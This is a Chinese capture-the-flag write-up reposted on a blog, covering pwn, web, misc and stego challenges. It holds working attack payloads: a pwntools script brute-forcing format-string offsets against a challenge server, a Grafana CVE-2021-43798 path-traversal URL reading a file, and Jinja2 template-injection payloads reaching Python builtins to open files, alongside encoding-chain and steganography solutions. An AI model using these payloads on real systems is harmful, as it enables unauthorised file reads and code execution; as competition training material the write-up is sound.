赞
踩
拿了三等奖的奖金,这学期不打了,作业太多了
通过分析发现flag 放在buf指向的地址处!
直接爆破
from pwn import * import time n=1 while 1: try: p=remote("118.195.147.196",9238) p.sendline('%'+str(n)+'$s') print(n) d=p.read() if b'flag' in d: print(n,d) break print(d) except: pass n=n+1
乱按就出了,视频为证,视频放压缩包里了
百度到CVE-2021-43798
payload:/public/plugins/welcome/../../../../../../../../home/grafana/flag
hackbar传,好像前端处理了,把…/搞没了,所以BP发包
前端应该做处理了看不见回显,使用BurpSuite
传入{{self}}
,返回模板数据
常规了self.__class__.__base__.__subclasses__()
查看type类的初始化方法,传入{{self.__class__.__base__.__subclasses__()[0].__init__}}
:
后面就是常规payload了,跑一下ls有文件名就直接获取了
?name={{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('flllll11111114aaaaaggggggggggggg').read()}}
参考文章
抓包,发现pick抓不到,是前端js代码,那就读代码,js里有提示jiami.v5,js混淆这没解开,强行读js,发现有个路径
访问啥都没有,抓下包,flag在返回信息里
伪加密,09改成00
图片上边左边看到白条,应该是lsb
stegsolve查看得到二维码
扫码得到
4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d
十六进制转字符串
JZJXG2TGHBFXQVTQOF4WQ5CTGVJGIVJSGF4UYWTVOFLDOWRYOVFWQ3KUGJ4XA2KIKJ5FIU3YKRJDIRKEK5CWS3L2OJAVASSOHBGVQRCWM5ZFM5CGJY======
base32
NSsjf8KxVpqyhtS5RdU21yLZuqV7Z8uKhmT2ypiHRzTSxTR4EDWEimzrAPJN8MXDVgrVtFN
base58
YXN1cml7aV90aGlua190aGF0X2lzX3NvX2Vhc3lfZm9yX3lvdX0=
base64
asuri{i_think_that_is_so_easy_for_you}
解压有个key.wav文件,应该是密钥
audacity频谱看一下,得到密钥MudaMudaMudaMuda
strings看下图片,发现结尾有一串字符串
RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==
base64
F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80 E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92
hex转字符
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/378310
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。